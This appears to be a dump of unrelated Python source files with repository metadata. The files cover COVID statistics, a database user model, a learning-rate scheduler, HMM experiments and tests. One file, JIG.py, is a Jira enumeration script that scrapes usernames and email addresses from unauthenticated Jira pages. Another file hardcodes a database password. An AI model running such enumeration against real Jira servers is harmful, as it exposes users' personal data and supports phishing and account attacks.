results = Results(search_info)
# Render and save
template_folder = os.path.dirname(template.filename)
content = template.render(search=search, results=results, base_template_path=template_folder)
save(table_filename, content)
| 33.275641 | 98 | 0.571181 | 4,593 | 0.884801 | 948 | 0.182624 | 686 | 0.132152 | 0 | 0 | 960 | 0.184935 |
9eec590065dcf6f8cc85b4d213651d2aa3e487f2 | 1,140 | py | Python | irancovid-19.py | AmiiirCom/irancovid-19 | c8871830e9344c5bf17043c802195911127bc532 | [
"MIT"
]
| null | null | null | irancovid-19.py | AmiiirCom/irancovid-19 | c8871830e9344c5bf17043c802195911127bc532 | [
"MIT"
]
| null | null | null | irancovid-19.py | AmiiirCom/irancovid-19 | c8871830e9344c5bf17043c802195911127bc532 | [
"MIT"
]
| null | null | null | from covid import Covid
import json
covid = Covid(source="worldometers")
covid.get_data()
iran_casses = covid.get_status_by_country_name("iran")
confirmed = iran_casses['confirmed']
new_cases = iran_casses['new_cases']
deaths = iran_casses['deaths']
recovered = iran_casses['recovered']
active = iran_casses['active']
critical = iran_casses['critical']
new_deaths = iran_casses ['new_deaths']
total_tests = iran_casses['total_tests']
total_tests_per_million = int(iran_casses['total_tests_per_million'])
total_cases_per_million = int(iran_casses['total_cases_per_million'])
total_deaths_per_million = int(iran_casses['total_deaths_per_million'])
population = int(iran_casses['population'])
pr = json.dumps({
'confirmed': confirmed,
'new_cases': new_cases,
'deaths': deaths,
'recovered': recovered,
'active': active,
'critical': critical,
'new_deaths': new_deaths,
'total_tests': total_tests,
'total_tests_per_million': total_tests_per_million,
'total_cases_per_million': total_cases_per_million,
'total_deaths_per_million': total_deaths_per_million,
'population': population
})
print(pr) | 30.810811 | 71 | 0.764035 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 364 | 0.319298 |
9eec86a2c6579218afa159749612db5d5e43ce59 | 3,198 | py | Python | models/__init__.py | esentino/literate-doodle | 598533042602b989a4bdaa8778968c5f3ead3500 | [
"Apache-2.0"
]
| null | null | null | models/__init__.py | esentino/literate-doodle | 598533042602b989a4bdaa8778968c5f3ead3500 | [
"Apache-2.0"
]
| null | null | null | models/__init__.py | esentino/literate-doodle | 598533042602b989a4bdaa8778968c5f3ead3500 | [
"Apache-2.0"
]
| 1 | 2019-09-11T21:27:37.000Z | 2019-09-11T21:27:37.000Z | # models/__init__.py
from clcrypto import password_hash
from psycopg2 import connect
def make_connection(db_name='w3'):
cnx = connect(user='postgres', password='coderslab', database=db_name, host='localhost')
cnx.autocommit = True
return cnx
class User:
__id = None
username = None
__hashed_password = None
email = None
def __init__(self):
self.__id = -1
self.username = ""
self.email = ""
self.__hashed_password = ""
@property
def id(self):
return self.__id
@property
def hashed_password(self):
return self.__hashed_password
def set_password(self, password, salt):
self.__hashed_password = password_hash(password, salt)
def save_to_db(self, cursor):
if self.__id == -1:
# saving new instance using prepared statements
sql = """INSERT INTO Users(username, email, hashed_password)
VALUES(%s, %s, %s) RETURNING id"""
values = (self.username, self.email, self.hashed_password)
cursor.execute(sql, values)
self.__id = cursor.fetchone()[0] # albo cursor.fetchone()['id']
return True
else:
sql = """UPDATE Users SET username=%s, email=%s, hashed_password=%s
WHERE id=%s"""
values = (self.username, self.email, self.hashed_password, self.id)
cursor.execute(sql, values)
return True
@staticmethod
def load_user_by_id(cursor, user_id):
sql = "SELECT id, username, email, hashed_password FROM users WHERE id=%s"
cursor.execute(sql, (user_id,)) # (user_id, ) - bo tworzymy krotkę
data = cursor.fetchone()
if data:
loaded_user = User()
loaded_user.__id = data[0]
loaded_user.username = data[1]
loaded_user.email = data[2]
loaded_user.__hashed_password = data[3]
return loaded_user
else:
return None
@staticmethod
def find_by_email(cursor, username):
sql = "SELECT id, username, email, hashed_password FROM users WHERE email=%s"
cursor.execute(sql, (username,)) # (user_id, ) - bo tworzymy krotkę
data = cursor.fetchone()
if data:
loaded_user = User()
loaded_user.__id = data[0]
loaded_user.username = data[1]
loaded_user.email = data[2]
loaded_user.__hashed_password = data[3]
return loaded_user
else:
return None
@staticmethod
def find_all( cursor):
sql = "SELECT id, username, email, hashed_password FROM Users"
ret = []
cursor.execute(sql)
for row in cursor.fetchall():
loaded_user = User()
loaded_user.__id = row[0]
loaded_user.username = row[1]
loaded_user.email = row[2]
loaded_user.__hashed_password = row[3]
ret.append(loaded_user)
return ret
def delete(self, cursor):
sql = "DELETE FROM Users WHERE id=%s"
cursor.execute(sql, (self.__id,))
self.__id = -1
return True
| 31.663366 | 92 | 0.581614 | 2,941 | 0.919063 | 0 | 0 | 1,667 | 0.520938 | 0 | 0 | 649 | 0.202813 |
9eed09503a5541f18459a14cf6ef3617066817b6 | 4,124 | py | Python | crys3d/command_line/model_viewer.py | rimmartin/cctbx_project | 644090f9432d9afc22cfb542fc3ab78ca8e15e5d | [
"BSD-3-Clause-LBNL"
]
| null | null | null | crys3d/command_line/model_viewer.py | rimmartin/cctbx_project | 644090f9432d9afc22cfb542fc3ab78ca8e15e5d | [
"BSD-3-Clause-LBNL"
]
| null | null | null | crys3d/command_line/model_viewer.py | rimmartin/cctbx_project | 644090f9432d9afc22cfb542fc3ab78ca8e15e5d | [
"BSD-3-Clause-LBNL"
]
| null | null | null | from __future__ import division
# LIBTBX_PRE_DISPATCHER_INCLUDE_SH export PHENIX_GUI_ENVIRONMENT=1
# LIBTBX_PRE_DISPATCHER_INCLUDE_SH export BOOST_ADAPTBX_FPE_DEFAULT=1
import cStringIO
from crys3d.wx_selection_editor import selection_editor_mixin
import wx
import libtbx.load_env
import sys, os, time
########################################################################
# CLASSES AND METHODS FOR STANDALONE VIEWER
#
class App (wx.App) :
def __init__ (self, title="crys3d.wx_model_viewer", default_size=(800,600),
viewer_class=selection_editor_mixin) :
self.title = title
self.default_size = default_size
self.viewer_class = viewer_class
wx.App.__init__(self, 0)
def OnInit (self) :
self.frame = wx.Frame(None, -1, self.title, pos=wx.DefaultPosition,
size=self.default_size)
self.frame.CreateStatusBar()
box = wx.BoxSizer(wx.VERTICAL)
self.view_objects = self.viewer_class(self.frame, size=(800,600))
box.Add(self.view_objects, wx.EXPAND, wx.EXPAND)
self.frame.SetSizer(box)
box.SetSizeHints(self.frame)
return True
def run (args, viewer_class=selection_editor_mixin) :
import cStringIO
pdb_files = []
cif_files = []
show_ss_restraints = False
fast_connectivity = True
for arg in args :
if os.path.isfile(arg) :
import iotbx.pdb
if iotbx.pdb.is_pdb_file(arg) :
pdb_files.append(os.path.abspath(arg))
elif arg.endswith(".cif") :
cif_files.append(os.path.abspath(arg))
elif arg == "--ss" :
show_ss_restraints = True
elif arg in ["--thorough", "--slow", "--use_monomer_library"] :
fast_connectivity = False
if len(pdb_files) == 0 :
print "Please specify a PDB file (and optional CIFs) on the command line."
return
a = App(viewer_class=viewer_class)
a.frame.Show()
out = sys.stdout
if not "--debug" in args :
out = cStringIO.StringIO()
for file_name in pdb_files :
print "Reading PDB file %s" % file_name
from iotbx import file_reader
from mmtbx.monomer_library import pdb_interpretation
from mmtbx import secondary_structure
t1 = time.time()
if fast_connectivity :
pdb_in = file_reader.any_file(file_name, force_type="pdb")
pdb_hierarchy = pdb_in.file_object.hierarchy
atomic_bonds = pdb_hierarchy.distance_based_simple_two_way_bond_sets()
acp_selection = None
else :
processed_pdb_file = pdb_interpretation.run(args=[file_name]+cif_files,
log=out)
pdb_hierarchy = processed_pdb_file.all_chain_proxies.pdb_hierarchy
pdb_hierarchy.atoms().reset_i_seq()
grm = processed_pdb_file.geometry_restraints_manager()
acp_selection = processed_pdb_file.all_chain_proxies.selection
if grm is None or grm.shell_sym_tables is None :
raise Sorry("Atomic bonds could not be calculated for this model. "+
"This is probably due to a missing CRYST1 record in the PDB file.")
atomic_bonds = grm.shell_sym_tables[0].full_simple_connectivity()
t2 = time.time()
print "%.2fs" % (t2-t1)
a.view_objects.add_model(file_name, pdb_hierarchy, atomic_bonds,
mmtbx_selection_function=acp_selection)
sec_str = secondary_structure.manager(
pdb_hierarchy=pdb_hierarchy,
xray_structure=None)
a.view_objects.set_sec_str(file_name, sec_str.selections_as_ints())
if show_ss_restraints and acp_selection is not None :
bonds_table = secondary_structure.process_structure(params=None,
processed_pdb_file=processed_pdb_file,
tmp_dir=os.getcwd(),
log=sys.stderr)
a.view_objects.set_noncovalent_bonds(file_name, bonds_table.bonds)
a.view_objects.flag_show_noncovalent_bonds = True
a.view_objects.set_model_base_color([1.0,1.0,1.0], file_name)
a.view_objects.set_color_mode("element")
a.view_objects.force_update(recenter=True)
a.MainLoop()
if __name__ == "__main__" :
if "--test" in sys.argv :
pdb_file = libtbx.env.find_in_repositories(
relative_path="phenix_regression/pdb/1ywf.pdb",
test=os.path.isfile)
run([pdb_file, "--ss"])
else :
run(sys.argv[1:])
| 38.185185 | 78 | 0.707081 | 663 | 0.160766 | 0 | 0 | 0 | 0 | 0 | 0 | 626 | 0.151794 |
9eedb43deb24d2533fe70662a5b08fab696d08f6 | 500 | py | Python | Crypto/py3compat.py | eddiejessup/transcrypt | 1a5894a2c355e1b88626a2b195e132bd7e701981 | [
"MIT"
]
| 14 | 2015-02-15T02:17:07.000Z | 2020-07-15T03:02:46.000Z | Crypto/py3compat.py | eddiejessup/Transcrypt | 1a5894a2c355e1b88626a2b195e132bd7e701981 | [
"MIT"
]
| 12 | 2015-04-11T14:26:14.000Z | 2021-09-07T09:25:38.000Z | Crypto/py3compat.py | eddiejessup/Transcrypt | 1a5894a2c355e1b88626a2b195e132bd7e701981 | [
"MIT"
]
| 4 | 2016-02-27T16:06:59.000Z | 2019-09-04T04:01:05.000Z | __revision__ = "$Id$"
def b(s):
return s.encode("latin-1")
def bchr(s):
return bytes([s])
def bstr(s):
if isinstance(s, str):
return bytes(s, "latin-1")
else:
return bytes(s)
def bord(s):
return s
def tobytes(s):
if isinstance(s, bytes):
return s
else:
if isinstance(s, str):
return s.encode("latin-1")
else:
return bytes(s)
def tostr(bs):
return bs.decode("latin-1")
from io import BytesIO
| 13.513514 | 38 | 0.542 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 42 | 0.084 |
9eedcf612c173937e475b9b20ab18a1677cc7feb | 2,758 | py | Python | verres/optim/schedule.py | csxeba/Verres | 04230d22b7791f84d86b9eb2272a6314a27580ed | [
"MIT"
]
| null | null | null | verres/optim/schedule.py | csxeba/Verres | 04230d22b7791f84d86b9eb2272a6314a27580ed | [
"MIT"
]
| null | null | null | verres/optim/schedule.py | csxeba/Verres | 04230d22b7791f84d86b9eb2272a6314a27580ed | [
"MIT"
]
| null | null | null | from typing import Dict
import numpy as np
import tensorflow as tf
import verres as V
class ConstantSchedule(tf.keras.optimizers.schedules.LearningRateSchedule):
def __init__(self, learning_rate: float):
super().__init__()
self.learning_rate = float(learning_rate)
def __call__(self, step):
return self.learning_rate
def get_config(self):
return dict(learning_rate=self.learning_rate)
class LinearLRSchedule(tf.keras.callbacks.Callback):
def __init__(self,
cycle_length: int,
steps_per_epoch: int,
lr_map: Dict[int, float],
initial_lr: float = None):
super().__init__()
self.schedule = None
self.pointer = 0
self.cycle_length = None
self.make_schedule(cycle_length, steps_per_epoch, lr_map, initial_lr)
def make_schedule(self,
cycle_length: int,
steps_per_epoch: int,
lr_map: Dict[int, float],
initial_lr: float = None):
self.cycle_length = cycle_length
schedule = np.empty(self.cycle_length * steps_per_epoch, dtype="float32")
if 0 not in lr_map:
if initial_lr is None:
raise RuntimeError("Either pass the initial learning rate in the lr_map or as a dedicated parameter!")
else:
lr_map = lr_map.copy()
initial_lr = lr_map.pop(0)
start_step = 0
current_lr = initial_lr
for end_epoch, next_lr in sorted(lr_map.items(), key=lambda it: it[0]):
steps = end_epoch * steps_per_epoch - start_step
schedule[start_step:start_step+steps] = np.linspace(
current_lr, next_lr, num=steps, endpoint=False, dtype="float32")
start_step += steps
current_lr = next_lr
schedule[start_step:] = current_lr
self.schedule = schedule
def on_batch_end(self, batch, logs=None):
self.model.optimizer.lr = self.schedule[self.pointer]
self.pointer += 1
self.pointer %= self.cycle_length
def on_epoch_end(self, epoch, logs=None):
logs["lr"] = self.schedule[self.pointer]
def factory(spec: dict) -> tf.optimizers.schedules.LearningRateSchedule:
name = spec.pop("name", "default")
if name.lower() in {"default", "constant"}:
scheduler = ConstantSchedule(float(spec["learning_rate"]))
else:
scheduler_type = getattr(tf.optimizers.schedules, name, None)
if scheduler_type is None:
raise KeyError(f"No such scheduler: {name}")
scheduler = scheduler_type(**spec)
print(f" [Verres.schedule] - Factory built: {name}")
return scheduler
| 32.069767 | 118 | 0.62074 | 2,139 | 0.775562 | 0 | 0 | 0 | 0 | 0 | 0 | 226 | 0.081943 |
9eeee0e6163243e2bcb3f1fbe4bb62fbc1fef478 | 4,865 | py | Python | JIG.py | mmg1/JIG | bc36ed013b5ba48e549a16151b9135e271d55055 | [
"MIT"
]
| 28 | 2017-12-04T02:03:25.000Z | 2021-09-13T04:37:21.000Z | JIG.py | mmg1/JIG | bc36ed013b5ba48e549a16151b9135e271d55055 | [
"MIT"
]
| 1 | 2018-01-20T21:13:56.000Z | 2018-01-20T21:13:56.000Z | JIG.py | NetSPI/JIG | bc36ed013b5ba48e549a16151b9135e271d55055 | [
"MIT"
]
| 18 | 2018-01-08T13:40:29.000Z | 2022-02-20T17:10:57.000Z | import re
import sys
from itertools import izip as zip
import argparse
import requests
# argparse definitions
parser = argparse.ArgumentParser(description='Jira attack script')
parser.add_argument('URL', type=str , help='the URL of the Jira instance... ex. https://jira.organization.com/')
parser.add_argument('-u' ,'--usernames', dest='names', action='store_const', const=True, help='Print discovered usernames')
parser.add_argument('-e' , '--emails', dest='emails',action='store_const', const=True, help='Print discovered email addresses')
parser.add_argument('-a' ,'--all', dest='all',action='store_const',const=True,help='Print discovered email addresses and usernames')
parser.add_argument('-eu' , dest='all',action='store_const',const=True,help=argparse.SUPPRESS)
parser.add_argument('-ue' , dest='all',action='store_const',const=True,help=argparse.SUPPRESS)
args = parser.parse_args()
url = args.URL
if args.URL[-1] != '/':
args.URL = args.URL + "/"
# Define URLs
pickerURL = args.URL + "secure/popups/UserPickerBrowser.jspa?max=9999"
filtersURL = args.URL + "secure/ManageFilters.jspa?filter=popular"
#dashboardURL = args.URL + "secure/Dashboard.jspa"
def extractPicker(response):
'''
Takes in the response body for UserBrowserPicker and returns a dictionary containing
usernames and email addresses.
'''
userList = re.compile(r"-name\">(.*)</td>").findall(response.text)
emailList = re.compile(r">(.*\@.*)</td>").findall(response.text)
dictionary = dict(zip(userList , emailList))
return dictionary
def extractFilters(response):
'''
Takes in the response body for the manage filters page and returns a list containing usernames.
'''
userList = re.compile(r"</span>.\((.*)\)").findall(response.text)
return list(set(userList))
def validateURL(url):
'''
Runs a stream of validation on a given URL and returns the response and a boolean value.
'''
try:
s = requests.Session()
validateresponse = s.get(url , allow_redirects=False,timeout=5)
except requests.exceptions.InvalidSchema:
print ""
print "[-] Invalid schema provided... Must follow format https://jira.organization.com/"
print ""
sys.exit(1)
except requests.exceptions.MissingSchema:
print ""
print "[-] A supported schema was not provided. Please use http:// or https://"
print ""
sys.exit(1)
except requests.exceptions.InvalidURL:
print "[-] Invalid base URL was supplied... Please try again."
sys.exit(1)
except requests.exceptions.ConnectionError:
print ""
print "[-] Connection failed... Please check the URL and try again."
print ""
sys.exit(1)
except requests.exceptions.RequestException:
print ""
print "[-] An unknown exception occurred... Please try again."
print ""
sys.exit(1)
if validateresponse.status_code == 200:
return validateresponse,True
else:
return "[-] The page is inaccessible",False
if __name__ == "__main__":
pickerResponse,pickerAccessible = validateURL(pickerURL)
filterResponse,filterAccessible = validateURL(filtersURL)
print ""
print ""
print "[+] Checking the User Picker page..."
if pickerAccessible == True:
users = extractPicker(pickerResponse)
print ""
print "[+] Success..."
print "[+] Users: "+str(len(users))
print "[+] Emails: " + str(len(users))
print ""
if (args.emails and args.names) or args.all:
print '{:<20}{:<20}'.format("---Username---", "---------Email---------")
for username, email in sorted(users.iteritems()):
print '{:<20}{:<20}'.format(username,email)
elif args.emails:
for username,email in sorted(users.iteritems()):
print email
elif args.names:
for username,email in sorted(users.iteritems()):
print username
print ""
elif pickerAccessible == False:
print pickerResponse
print ""
print ""
print "[+] Checking the Manage Filters page..."
if filterAccessible == True:
filterUsers = extractFilters(filterResponse)
if args.names or args.all:
if len(filterUsers) == 0:
print "[-] We could not find any anonymously accessible filters"
print ""
else:
print "[+] The Manage Filters page is accessible and contains data..."
print ""
for username in filterUsers:
print username
print ""
elif filterAccessible == False:
print filterResponse | 39.233871 | 133 | 0.615211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,668 | 0.342857 |
9eef48e8177814194dd2d1510e39357b5d13bd02 | 4,383 | py | Python | run.py | SamChatfield/final-year-project | 9d1ae2cb3009ffbff89cb438cfcde855db8a53ac | [
"MIT"
]
| null | null | null | run.py | SamChatfield/final-year-project | 9d1ae2cb3009ffbff89cb438cfcde855db8a53ac | [
"MIT"
]
| null | null | null | run.py | SamChatfield/final-year-project | 9d1ae2cb3009ffbff89cb438cfcde855db8a53ac | [
"MIT"
]
| null | null | null | import json
import string
from datetime import datetime
import deap
import numpy as np
import hmm
from discriminator import Discriminator
from ea import EA
import random_search
DEFAULT_PARAMS = {
# Discriminator CNN model
"model": "CNNModel3",
# Algorithm Parameters
"states": 5,
"symbols": 5,
"epochs": 10,
"epoch_size": 500,
"batch_size": 200,
"seq_len": 20,
"pop_size": 25,
"gens": 50,
"offspring_prop": 1.0,
"cx_prob": 0.0,
"mut_fn": "uniform",
"mut_prob": 1.0,
"mut_rate": None, # None - default to 1/N where N is number of genes
# Implementation Parameters
"_pool_size": 4,
"_random_search": True, # Also run an elitist random search over #gens to compare performance
}
def param_assert(params):
assert params["states"] > 0
assert 0 < params["symbols"] <= 26
assert 0.0 <= params["offspring_prop"] <= 1.0
assert 0.0 <= params["cx_prob"] <= 1.0
assert 0.0 <= params["mut_prob"] <= 1.0
assert (params["mut_rate"] is None) or (0.0 <= params["mut_rate"] <= 1.0)
def run(param_subset):
# Overwrite the default values of the provided parameters
params = {**DEFAULT_PARAMS, **param_subset}
print(params)
param_assert(params)
x = params["states"]
y = string.ascii_lowercase[: params["symbols"]]
s = [1.0] + [0.0] * (x - 1)
# Random HMM that will act as the 'true' underlying distribution
real_hmm = hmm.random_hmm(x, y, s)
# Different random HMM that will be used to benchmark the best solution we find
rand_hmm = hmm.random_hmm(x, y, s)
d = Discriminator(
real_hmm,
params["epoch_size"],
params["batch_size"],
params["seq_len"],
model=params["model"],
pool_size=params["_pool_size"],
)
print("Pre-training discriminator...")
accs, losses = d.initial_train(params["epochs"])
acc = accs[-1]
loss = losses[-1]
print(f"Pre-trained discriminiator accuracy: {acc}, loss: {loss}")
g = EA(
discriminator=d,
pop_size=params["pop_size"],
states=x,
symbols=len(y),
offpr=params["offspring_prop"],
cxpb=params["cx_prob"],
mut_fn=params["mut_fn"],
mutpb=params["mut_prob"],
mut_rate=params["mut_rate"],
)
print("Running generator...")
final_pop, _, logbook = g.run(params["gens"])
best_ind = deap.tools.selBest(final_pop, 1)[0]
best_hmm = hmm.HMM(x, np.array(list(y)), best_ind[0], best_ind[1], np.array(s))
if params["_random_search"]:
print("Running random search benchmark...")
rs_best_hmm, rs_best_acc = random_search.run(
d, params["states"], params["symbols"], params["gens"]
)
else:
rs_best_hmm, rs_best_acc = None, None
return real_hmm, best_hmm, rand_hmm, rs_best_hmm, logbook
def experiment(params, runs):
all_params = {**DEFAULT_PARAMS, **params}
do_rand_search = all_params["_random_search"]
mean_fitnesses = []
best_l2s = []
rand_l2s = []
if do_rand_search:
rs_l2s = []
for i in range(runs):
print(f"Run {i+1}")
real_hmm, best_hmm, rand_hmm, rs_best_hmm, logbook = run(params)
best_l2 = hmm.total_l2_diff(real_hmm, best_hmm)
rand_l2 = hmm.total_l2_diff(real_hmm, rand_hmm)
if do_rand_search:
rs_l2 = hmm.total_l2_diff(real_hmm, rs_best_hmm)
mean_fitnesses.append(logbook.select("mean"))
best_l2s.append(best_l2)
rand_l2s.append(rand_l2)
extra_msg = ""
if do_rand_search:
rs_l2s.append(rs_l2)
extra_msg = f", RandSearch L2: {rs_l2}"
print(f"Best L2: {best_l2}, Rand L2: {rand_l2}{extra_msg}")
exp_data = {
"params": all_params,
"mean_fitnesses": mean_fitnesses,
"best_l2s": best_l2s,
"rand_l2s": rand_l2s,
}
if do_rand_search:
exp_data["rs_l2s"] = rs_l2s
exp_file = f'experiments/exp_{datetime.now().strftime("%y%m%d-%H%M%S%f")}.json'
with open(exp_file, "w") as f:
json.dump(exp_data, f, indent=4)
return exp_data
def main():
real_hmm, best_hmm, best_l2 = run(DEFAULT_PARAMS)
print(
f"""
Real HMM: {real_hmm}
Best HMM: {best_hmm}
Best L2: {best_l2}
"""
)
if __name__ == "__main__":
main()
| 26.72561 | 98 | 0.6094 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,332 | 0.303901 |
9ef2b9fdb256c9db58c16d3d792f230772a8e948 | 2,174 | py | Python | rrc_example_package/benchmark_rrc/tools/plot/exp_align_obj.py | wq13552463699/TriFinger_Research | 6ddfab4531cb4ba05a0fbb41227a734295dce378 | [
"BSD-3-Clause"
]
| 12 | 2021-05-06T18:00:21.000Z | 2022-01-11T14:23:22.000Z | rrc_example_package/benchmark_rrc/tools/plot/exp_align_obj.py | wq13552463699/TriFinger_Research | 6ddfab4531cb4ba05a0fbb41227a734295dce378 | [
"BSD-3-Clause"
]
| 3 | 2021-06-03T16:06:01.000Z | 2021-08-15T13:40:09.000Z | rrc_example_package/benchmark_rrc/tools/plot/exp_align_obj.py | wq13552463699/TriFinger_Research | 6ddfab4531cb4ba05a0fbb41227a734295dce378 | [
"BSD-3-Clause"
]
| 4 | 2021-05-12T02:34:34.000Z | 2021-07-18T19:54:50.000Z | #!/usr/bin/env python3
'''
This code traverses a directories of evaluation log files and
record evaluation scores as well as plotting the results.
'''
import os
import argparse
import json
import copy
from shutil import copyfile
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
from utils import *
MAX_ALIGN_STEPS = 75000 - 1 # This depends on the evaluation code used to generate the logs
def generate_csv(log_dir, csv_file):
'''
Traverse and read log files, and then output csv file from the eval data.
- file to be generated: 'eval_scores.csv'
- columns: state_machine_id, timesteps, rot_error
'''
df = pd.DataFrame(columns=['state_machine_id', 'state_machine_name', 'timesteps', 'rot_error'])
model_names = extract_model_names(log_dir)
# Traverse all episodes and add each entry to data frame
for state_machine_id, episode_idx, episode_dir in traverse_all_episodes(log_dir):
json_util = JsonUtil(os.path.join(episode_dir, 'goal.json'))
entry = {
'state_machine_id': state_machine_id,
'state_machine_name': model_names[state_machine_id],
**json_util.load()
}
# Handling the timesteps==-1 case
if entry['reachfinish'] == -1:
entry['reachfinish'] = MAX_ALIGN_STEPS
if entry['reachstart'] == -1:
raise ValueError('\'reachstart\' in {episode_dir}/goal.json does not contain a valid value.')
# Rename dict keys
entry['timesteps'] = entry.pop('reachfinish') - entry.pop('reachstart')
entry['rot_error'] = entry.pop('align_obj_error')
entry['init_rot_error'] = entry.pop('init_align_obj_error', None)
# Add a new entry
entry['rot_error_diff'] = entry['init_rot_error'] - entry['rot_error']
df = df.append(entry, ignore_index=True) # df.append works differently from python since it is stupid
df.to_csv(csv_file, index=False)
def generate_plot(input_csv_file, plot_file):
data = pd.read_csv(input_csv_file)
sns.scatterplot(data=data, x="timesteps", y="rot_error", hue="state_machine_name", alpha=0.8)
plt.savefig(plot_file)
| 35.639344 | 110 | 0.689512 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 994 | 0.457222 |
9ef2bd5f0fee2640fb7fcf65e291ea514c7f1058 | 286 | py | Python | test cases/common/64 custom header generator/makeheader.py | objectx/meson | c0f097c0c74551972f7ec2203cd960824984f058 | [
"Apache-2.0"
]
| null | null | null | test cases/common/64 custom header generator/makeheader.py | objectx/meson | c0f097c0c74551972f7ec2203cd960824984f058 | [
"Apache-2.0"
]
| null | null | null | test cases/common/64 custom header generator/makeheader.py | objectx/meson | c0f097c0c74551972f7ec2203cd960824984f058 | [
"Apache-2.0"
]
| null | null | null | #!/usr/bin/env python3
# NOTE: this file does not have the executable bit set. This tests that
# Meson can automatically parse shebang lines.
import sys
template = '#define RET_VAL %s\n'
output = template % (open(sys.argv[1]).readline().strip())
open(sys.argv[2], 'w').write(output)
| 26 | 71 | 0.713287 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 164 | 0.573427 |
9ef42081bff35de1f92bff97bfccd08e32e6f3d8 | 395 | py | Python | studio_ghibli/movies/test_data.py | hbansal0122/studio_ghibli_project | 1a2df853f9d5088aa137f372ab0ee83ce8ba3667 | [
"MIT"
]
| null | null | null | studio_ghibli/movies/test_data.py | hbansal0122/studio_ghibli_project | 1a2df853f9d5088aa137f372ab0ee83ce8ba3667 | [
"MIT"
]
| null | null | null | studio_ghibli/movies/test_data.py | hbansal0122/studio_ghibli_project | 1a2df853f9d5088aa137f372ab0ee83ce8ba3667 | [
"MIT"
]
| null | null | null | """ Test data"""
stub_films = [{
"id": "12345",
"title": "This is film one",
},{
"id": "23456",
"title": "This is film two",
}]
stub_poeple = [{
"name": "person 1",
"films": ["url/12345", "url/23456"]
},{
"name": "person 2",
"films": ["url/23456"]
},{
"name": "person 3",
"films": ["url/12345"]
},{
"name": "person 4",
"films": ["url/12345"]
}] | 16.458333 | 39 | 0.463291 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 235 | 0.594937 |
9ef4febad34c41f83b4899c15a9e9cfec2b40a27 | 236 | py | Python | data_converters/fsdbripper/create_new_db.py | osvaldolove/amiberry-api | 3310592d2411c69f7c225edb3e3907e6a5e6caf8 | [
"MIT"
]
| null | null | null | data_converters/fsdbripper/create_new_db.py | osvaldolove/amiberry-api | 3310592d2411c69f7c225edb3e3907e6a5e6caf8 | [
"MIT"
]
| null | null | null | data_converters/fsdbripper/create_new_db.py | osvaldolove/amiberry-api | 3310592d2411c69f7c225edb3e3907e6a5e6caf8 | [
"MIT"
]
| 1 | 2018-08-22T21:55:26.000Z | 2018-08-22T21:55:26.000Z | import sqlite3
from constants import DESTINATION_DB
destination_connection = sqlite3.connect(DESTINATION_DB)
destination_cursor = destination_connection.cursor()
destination_cursor.execute('CREATE TABLE game(uuid, payload)')
| 26.222222 | 63 | 0.817797 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 34 | 0.144068 |
9ef65f5bf372723d5444efb6cd95a0880cc13cef | 7,366 | py | Python | upvote/gae/shared/common/json_utils_test.py | cclauss/upvote | 9d526fec72690cde1575dbd32dacf68cbbab81d1 | [
"Apache-2.0"
]
| null | null | null | upvote/gae/shared/common/json_utils_test.py | cclauss/upvote | 9d526fec72690cde1575dbd32dacf68cbbab81d1 | [
"Apache-2.0"
]
| null | null | null | upvote/gae/shared/common/json_utils_test.py | cclauss/upvote | 9d526fec72690cde1575dbd32dacf68cbbab81d1 | [
"Apache-2.0"
]
| null | null | null | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for json_utils."""
import datetime
import json
from google.appengine.ext import ndb
from common.testing import basetest
from upvote.gae.datastore.models import santa
from upvote.gae.shared.common import json_utils
from upvote.shared import constants
class TestModel(ndb.Model):
datetime_prop = ndb.DateTimeProperty()
int_prop = ndb.IntegerProperty()
string_prop = ndb.StringProperty()
class BaseEncoderTest(basetest.AppEngineTestCase):
def setUp(self):
super(BaseEncoderTest, self).setUp()
self.test_model = TestModel(
datetime_prop=datetime.datetime(2015, 6, 3, 12, 30, 0),
int_prop=111,
string_prop='STRING!')
self.test_key = self.test_model.put()
self.blockable_key = ndb.Key(
santa.SantaBlockable, 'aaaabbbbccccddddeeeeffffgggg')
self.santa_event = santa.SantaEvent(
id='2324342',
blockable_key=self.blockable_key,
event_type=constants.EVENT_TYPE.ALLOW_UNKNOWN,
executing_user='user1',
file_name='Product.app',
file_path='/Applications/Product.app/Contents/MacOs',
host_id='AAAAAAAA-1111-BBBB-2222-CCCCCCCCCCCC',
last_blocked_dt=datetime.datetime(2015, 4, 1, 17, 0, 0),
first_blocked_dt=datetime.datetime(2015, 4, 1, 17, 0, 0))
def _PerformEncoding(self, to_encode):
encoded = self.json_encoder.encode(to_encode)
return json.loads(encoded)
def _VerifyEncoding(self, expected, actual):
if isinstance(expected, list):
self.assertTrue(isinstance(actual, list))
self.assertEqual(len(expected), len(actual))
for i, j in zip(sorted(expected), sorted(actual)):
self._VerifyEncoding(i, j)
elif isinstance(expected, dict):
self.assertTrue(isinstance(actual, dict))
# assertDictEqual would be more concise, but this keeps us from having to
# update the expected dict every time there's a model change, e.g.
# SantaEvent.
for key, value in expected.iteritems():
self.assertIn(key, actual)
self.assertEqual(value, actual[key])
else:
self.assertEqual(expected, actual)
class JSONEncoderTest(BaseEncoderTest):
def setUp(self):
super(JSONEncoderTest, self).setUp()
self.json_encoder = json_utils.JSONEncoder()
def testEncode_Set(self):
actual = self._PerformEncoding(set(['aaa', 'bbb', 'ccc']))
self._VerifyEncoding(['aaa', 'bbb', 'ccc'], actual)
def testEncode_Frozenset(self):
actual = self._PerformEncoding(frozenset(['aaa', 'bbb', 'ccc']))
self._VerifyEncoding(['aaa', 'bbb', 'ccc'], actual)
def testEncode_Datetime(self):
actual = self._PerformEncoding(datetime.datetime(2015, 4, 1, 17, 0, 0))
